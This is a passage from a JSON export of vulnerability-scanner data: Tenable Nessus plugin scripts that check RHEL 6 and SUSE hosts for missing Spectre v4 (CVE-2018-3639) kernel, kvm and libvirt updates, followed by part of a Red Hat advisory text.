and enhancements in this advisory. See the descriptions in the related Knowledge Article: https://access.redhat.com/articles/3483021", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2018-1826.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110506", "published": "2018-06-13T00:00:00", "title": "RHEL 6 : kernel (RHSA-2018:1826) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1826. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110506);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:57\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:1826\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2018:1826) (Spectre)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 6.7\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639, PowerPC)\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\n\nBug Fix(es) and Enhancement(s) :\n\nThese updated kernel packages include also numerous bug fixes and\nenhancements. Space precludes documenting all of the bug fixes and\nenhancements in this advisory. See the descriptions in the related\nKnowledge Article: https://access.redhat.com/articles/3483021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/ssbd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/3483021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:1826\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3639\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6\\.7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.7\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1826\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"kernel-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"kernel-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", reference:\"kernel-abi-whitelists-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", reference:\"kernel-doc-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", reference:\"kernel-firmware-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"perf-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"perf-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"perf-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"perf-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"perf-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"python-perf-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"python-perf-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"i686\", reference:\"python-perf-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-573.59.1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:40:05", "bulletinFamily": "scanner", "description": "This update for kvm fixes one security issues. This security issue was fixed :\n\n - CVE-2018-3639: Spectre v4 vulnerability mitigation support for KVM guests (bsc#1092885). Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis. This patch permits the new x86 cpu feature flag named 'ssbd' to be presented to the guest, given that the host has this feature, and KVM exposes it to the guest as well.\n For this feature to be enabled please use the qemu commandline\n\n -cpu $MODEL,+spec-ctrl,+ssbd so the guest OS can take advantage of the feature. spec-ctrl and ssbd support is also required in the host.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1479-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110261", "published": "2018-05-31T00:00:00", "title": "SUSE SLES11 Security Update : kvm (SUSE-SU-2018:1479-1) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1479-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110261);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLES11 Security Update : kvm (SUSE-SU-2018:1479-1) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for kvm fixes one security issues. This security issue was\nfixed :\n\n - CVE-2018-3639: Spectre v4 vulnerability mitigation\n support for KVM guests (bsc#1092885). Systems with\n microprocessors utilizing speculative execution and\n speculative execution of memory reads before the\n addresses of all prior memory writes are known may allow\n unauthorized disclosure of information to an attacker\n with local user access via a side-channel analysis. This\n patch permits the new x86 cpu feature flag named 'ssbd'\n to be presented to the guest, given that the host has\n this feature, and KVM exposes it to the guest as well.\n For this feature to be enabled please use the qemu\n commandline\n\n -cpu $MODEL,+spec-ctrl,+ssbd so the guest OS can take\n advantage of the feature. spec-ctrl and ssbd support is\n also required in the host.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181479-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8377233\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-kvm-13634=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! ereg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kvm-1.4.2-60.12.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kvm\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:39:59", "bulletinFamily": "scanner", "description": "This update for libvirt fixes the following issues :\n\n - CVE-2018-3639: cpu: add support for 'ssbd' and 'virt-ssbd' CPUID feature bits pass through.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1452-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110189", "published": "2018-05-29T00:00:00", "title": "SUSE SLES11 Security Update : libvirt (SUSE-SU-2018:1452-1) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1452-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110189);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLES11 Security Update : libvirt (SUSE-SU-2018:1452-1) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libvirt fixes the following issues :\n\n - CVE-2018-3639: cpu: add support for 'ssbd' and\n 'virt-ssbd' CPUID feature bits pass through.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181452-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88b7aae6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-libvirt-13626=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-libvirt-13626=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-libvirt-13626=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-lock-sanlock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"libvirt-client-32bit-1.0.5.9-21.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"libvirt-client-32bit-1.0.5.9-21.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libvirt-1.0.5.9-21.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libvirt-client-1.0.5.9-21.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libvirt-doc-1.0.5.9-21.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libvirt-lock-sanlock-1.0.5.9-21.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libvirt-python-1.0.5.9-21.9.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvirt\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "redhat": [{"lastseen": "2018-12-11T21:40:56", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639, x86 AMD)\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.\n\nBug Fix(es):\n\n* When a Nonvolatile Memory Express (NVMe) namespace was created, changed, or deleted, an occasional deadlock occurred. With this update, namespace scanning and removal does not hold a mutual exclusion (mutex) program object. As a result, a deadlock no longer occurs in the described scenario. (BZ#1566886)\n\n* Previously, a live migration of a virtual machine from one host with updated firmware to another host without updated firmware resulted in incorrect kernel settings for Meltdown mitigations, which could leave the kernel vulnerable to Meltdown. With this fix, the firmware on the new physical host is re-scanned for updates after a live migration. As a result, the kernel uses the correct mitigation in the described scenario. (BZ#1570507)\n\n* Previously, microcode updates on 32 and 64-bit AMD and Intel architectures were not synchronized. As a consequence, it was not possible to apply the microcode updates. This fix adds the synchronization to the microcode updates so that processors of the stated architectures receive updates at the same time. As a result, microcode updates are now synchronized. (BZ#1578044)\n\n* When switching from the indirect branch speculation (IBRS) feature to the retpolines feature, the IBRS state of some CPUs was sometimes not handled correctly. Consequently, some CPUs were left with the IBRS Model-Specific Register (MSR) bit set to 1, which could lead to performance issues. With this update, the underlying source code has been fixed to 